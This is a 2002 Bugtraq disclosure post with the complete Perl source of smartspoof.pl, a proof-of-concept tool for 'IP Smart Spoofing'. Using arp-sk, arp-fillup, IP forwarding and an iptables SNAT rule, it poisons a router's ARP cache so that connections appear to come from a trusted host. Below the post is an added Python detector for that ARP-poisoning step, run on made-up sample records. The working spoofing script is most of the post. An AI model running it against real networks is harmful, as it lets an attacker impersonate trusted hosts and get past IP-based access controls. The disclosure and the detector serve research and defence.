Exploit code for IP Smart Spoofing
Date: Tue, 12 Nov 2002 13:21:17 +0100
From: Laurent Licour <llicour@althes.fr>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Subject: Exploit code for IP Smart Spoofing
Hello
As we reported in our previous article, IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a
new method for IP spoofing, allowing a full connection from any client
software.
The exploit code smartspoof.pl is a proof of concept (for educational
purposes only) of the Smart Spoofing method.
The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz
These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools
Exploit Code (perl source):
#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# llicour@althes.fr
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

# Look up the next hop for $ip0 in the kernel routing table ("route -n").
# The most specific matching route wins; the outgoing interface name is
# returned through the scalar reference $int.
sub get_ip_next_hop
{
    my ($ip0, $int) = @_;
    my $ip = new NetAddr::IP $ip0;

    open(ROUTE, "route -n |");
    <ROUTE>; <ROUTE>;          # skip the two header lines
    my $gateway = "";
    my $masklen; my @fields; my $line; my $entry;
    while ($line = <ROUTE>)
    {
        # Destination Gateway Genmask Flags Metric Ref Use Iface
        @fields = split / +/, $line;
        $entry = new NetAddr::IP($fields[0] . "/" . $fields[2]);
        if ($entry->contains($ip))
        {
            if (($gateway eq "") or ($masklen < $entry->masklen()))
            {
                $gateway = $fields[1];
                $masklen = $entry->masklen();
                $$int = $fields[7];
                chop $$int;    # drop the trailing newline
            }
        }
    }
    die "Error : No route for $ip \n" if ($gateway eq "");
    # A gateway of 0.0.0.0 means the host is directly connected
    $gateway = $ip->addr() if ($gateway eq "0.0.0.0");
    return($gateway);
}

# Resolve an IP to its MAC address: ping it once, then read the ARP cache
sub get_mac
{
    my $ip = shift;
    my $cmd = "ping -c 1 -w 1 $ip >/dev/null 2>&1";
    system($cmd);
    $cmd = "cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
    my $mac = `$cmd`;
    chop($mac);
    return($mac);
}

sub usage
{
    print "Start/Stop de smartspoofing\n\n";
    print "This is the proof of concept of the smartspoofing technique\n";
    print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
    print "\n";
    print "You only have to specify :\n";
    print " -D : address of the filtering equipement to connect to\n";
    print " -S : address of the trusted host to spoof\n";
    print "\n";
    print "Then, you only need to launch your favorite client software from this host\n";
    print "or any host behind this (because it is now a router)\n";
    print "\n";
    print "This script is provided as proof of concept for educational purpose only.\n";
    print "\n";
    exit 0;
}

my $syntax = "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@IP source> -start|-stop\n";
my $ver = "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface = "";
my ($version, $help);

Getopt::Long::GetOptions(
    "D=s"   => \$ipdst,
    "S=s"   => \$ipsrc,
    "i=s"   => \$interface,
    "v"     => \$version,
    "h"     => \$help,
    "start" => \$start,
    "stop"  => \$stop
) or die $syntax;

usage if $help;
die $ver if $version;
die $syntax unless @ARGV == 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;
my ($intsrc, $intdst);
my $ipsrc_next_hop = get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop = get_ip_next_hop($ipdst, \$intdst);
# Default to the interface that reaches the destination
$interface = $intdst if ($interface eq "");

if ($start)
{
    print "Activate IP Forwarding\n";
    system("echo 1 > /proc/sys/net/ipv4/ip_forward");

    print "Activate Arp fillup on $ipsrc\n";
    system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

    print "Set NAT rule on iptables\n";
    $cmd = "iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT --to $ipsrc";
    system($cmd);

    print "Desactivate ICMP Redirect\n";
    system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP");

    print "Activate Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop on $interface\n";
    $cmd = "arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop -c 1 >/dev/null 2>&1";
    system($cmd);
    $cmd = "arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop >/dev/null 2>&1 &";
    system($cmd);
}
elsif ($stop)
{
    print "Suppress Arp fillup on $ipsrc\n";
    system("killall arp-fillup");

    print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop\n";
    system("killall arp-sk");
    # Restore the genuine MAC of the next hop in the poisoned ARP cache
    my $mac = get_mac($ipsrc_next_hop);
    $cmd = "arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
    system($cmd);

    print "Clear iptables rules\n";
    system("service iptables stop");
    system("service iptables start");

    print "Desactivate ip forwarding\n";
    system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}
Regards
Laurent Licour
mailto:llicour@althes.fr
Althes
http://www.althes.fr
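Detection logic for the ARP cache poisoning step that smartspoof.pl drives with arp-sk, written from the defender's side as an added example (not part of the original post or of the smartspoof.pl/arp-sk tools); the ARP records, IP addresses and MAC addresses are constructed samples.

```python
"""Detect the ARP-poisoning step of IP Smart Spoofing from ARP traffic.

Added example, not part of the original post or the smartspoof.pl tool.
smartspoof.pl makes the router's ARP entry for the trusted host (or its
next hop) point at the spoofing host's MAC: one forged who-has (arp-sk -w)
followed by a loop of forged is-at replies (arp-sk -r) that the router
never asked for. Two wire-level symptoms follow: an IP suddenly claimed by
a second MAC, and replies with no matching request. The records below are
constructed samples, not captured traffic; all addresses are made up.
"""

# (seconds, op, sender_ip, sender_mac, target_ip) as seen by a LAN sensor.
# op is "request" (who-has) or "reply" (is-at).
SAMPLE_ARP = [
    (0.0, "request", "192.168.1.1", "00:11:22:33:44:01", "192.168.1.20"),
    (0.1, "reply", "192.168.1.20", "00:11:22:33:44:20", "192.168.1.1"),
    (9.0, "request", "192.168.1.20", "00:11:22:33:44:ee", "192.168.1.1"),
    (9.5, "reply", "192.168.1.20", "00:11:22:33:44:ee", "192.168.1.1"),
    (10.5, "reply", "192.168.1.20", "00:11:22:33:44:ee", "192.168.1.1"),
]


def detect_arp_poisoning(records, request_window=2.0):
    """Return (kind, ip, detail, ts) alerts over time-ordered ARP records.

    kind is 'binding_change' (reported once per new IP->MAC pair) or
    'unsolicited_reply' (an is-at with no who-has from the target within
    request_window seconds, which is what the arp-sk -r loop produces).
    """
    first_mac = {}      # ip -> MAC first seen claiming it
    reported = set()    # (ip, mac) pairs already alerted on
    pending = {}        # (asker_ip, asked_ip) -> time of the last who-has
    alerts = []
    for ts, op, sip, smac, tip in records:
        known = first_mac.setdefault(sip, smac)
        if known != smac and (sip, smac) not in reported:
            reported.add((sip, smac))
            alerts.append(("binding_change", sip, f"{known} -> {smac}", ts))
        if op == "request":
            pending[(sip, tip)] = ts
        else:
            asked = pending.get((tip, sip))
            if asked is None or ts - asked > request_window:
                alerts.append(("unsolicited_reply", sip, smac, ts))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP):
        print(alert)
```

On the sample the first reply is solicited and quiet; the forged who-has at t=9.0 raises one binding change and the two forged replies are flagged as unsolicited.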